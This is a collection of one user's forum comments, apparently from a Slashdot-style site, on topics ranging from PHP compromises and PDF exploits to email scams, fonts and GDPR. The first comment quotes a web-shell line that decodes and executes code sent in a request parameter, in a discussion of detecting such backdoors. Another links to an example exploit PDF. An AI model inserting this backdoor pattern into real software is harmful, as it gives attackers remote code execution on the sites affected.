So it seems he went farther :D
Agree that is difficult to catch it. For the log, in this case there are both functions, the output looks something like this:

  $j6 = create_function('', base64_decode($_REQUEST['sort']));
  $j6(); // execution
The `create_function()`[1] will internally execute `eval()` so the result would be the same.

For "known good" folder, a git repository may help, at least to restore a clean version of the code.
Re:Facebook blocks sharing of critical Guardian article on Friday September 28, 2018 @05:47PM (#18097323)
I second that.

An example: a few weeks ago I shared on my FB profile the Mozilla Foundation petition link for the EU copyright reform[1] and it was removed with this motivation:

"We removed this post because it looks like spam and doesn't follow our Community Standards."

It reminds me about John Cage's 4'33''

An anecdote: when my semiotics professor talked about this composition for the first time, I was recording the lecture, and when colleagues asked for a copy, I sent them only the pauses between the sentences. When art meets sarcasm, it spreads really fast.

Re:Panic Attacks on Tuesday August 21, 2018 @12:23PM (#17810996)
Yes, I read that sentence before writing and your argument about the website expenses can be valid. It does not change my main point: when it is about health one should search for information from qualified professionals. For example:

1. https://www.anxiety.org/panic-disorder-panic-attacks

2. https://www.mayoclinic.org/diseases-conditions/panic-attacks...

A personal experience can be illuminating sometimes but it cannot be considered an alternative approach. For this reason, I do not consider it a good source. Just my opinion.

Re:Panic Attacks on Tuesday August 21, 2018 @10:36AM (#17809965)
Hmm. To me, it seems not. Or at least, it seems an everyday expertise knowledge, derived from direct experience. He does not seem to be a qualified expert. The goal here is to sell the books.

Hi,

apart from programming you could add a remote part-time job, look at positions available at:

Re:Is Firefox lying to users about viruses in downloads? on Wednesday July 04, 2018 @12:42PM (#17458160)
It depends on the exploit and on the reader. If, for example, the reader supports javascript then it can be attacked, apart from other weaknesses. Chrome on Linux executes javascript in PDF, while Firefox does not.

Here is an example file: https://we.tl/q90gXERGmx

Sorry, what is the meaning of TTT? I did a search but could not find a definition.

Edit: got it, trillion.

Re:Introspect Yourself on Wednesday April 25, 2018 @02:13PM (#16924372)
I see it as a suggestion to try to give the best of yourself in everything you do: use the same passion/positive attitude that you put in something you appreciate (your work for example) for all the aspect of your life, and you will get a better control of yourself.
Re:Reddit's redesign could kill discussion subreddits on Thursday April 12, 2018 @11:12AM (#16821750)
I was doing something similar:

  var downvoted = document.querySelectorAll('.comment > span:not(.c00)');
  for(let i = 0, c = downvoted.length; i < c; i++)
  {
    downvoted[i].style.color = '#70798C';
  }
Re:The dots do matter: how to scam a Gmail user on Sunday April 08, 2018 @04:41AM (#16785251)
It happened something similar to me a few weeks ago: the scammer registered an account indicating my Gmail address, with dots. I wasn't signed to the service with that address.

When I asked Netflix's support to remove the association of that account with my e-mail address, they replied I had to change the card details with mine, because it was like I was "stealing" the scammer account credit card. I replied I would not add my credit card details. The operator then wrote me he was going to invalidate my e-mail address so that the user that would log in, had to change it. And that it should solve my issue.

The problem, for me, is not the Gmail feature. Nor the dots, neither the plus addressing. It's a lack of the validation systems. Just verify the e-mail ownership before allowing any interaction.

True, I'm not much into client side programming, just learning and lectures like this or Axel Rauschmayer's[1] are gold sources to understand Javascript.

Re:Sysadmin war story: the network ate my font on Friday September 15, 2017 @04:33PM (#15260540)
Re:10 most popular coding fonts on Tuesday September 05, 2017 @07:49PM (#15180027)
It depends, I try to choose something that's easy to read to avoid confusion between some characters and numbers. Also some programming fonts offer symbols ligatures. I don't like them, maybe it's just an habit but, if I have to write something, I don't want to think about the meaning of a symbol into another font. I find my self comfortable with the Ubuntu fonts, these are my system & browser defaults. Being everywhere in the interface I forget about them and concentrate on the code. Color palettes and code highlighting are also my concerns, I change them depending on ambient light. But I usually prefer bright palettes.
Re:Feather: Open-source icons on Thursday August 24, 2017 @12:43PM (#15091655)
Maybe because the handle points to the right side, while usually points to the left, making it easy to recognize the icon if you are reading from left to right.

People would register and then never come back because they just didn't care enough to look for our confirmation email.

Some countries in Europe require to prove user opt-in consent, in addition the EU General Data Protection Regulation (GDPR)[1] approved in 2016 and active starting from May 2018 will, in practice, extend it to all EU countries.
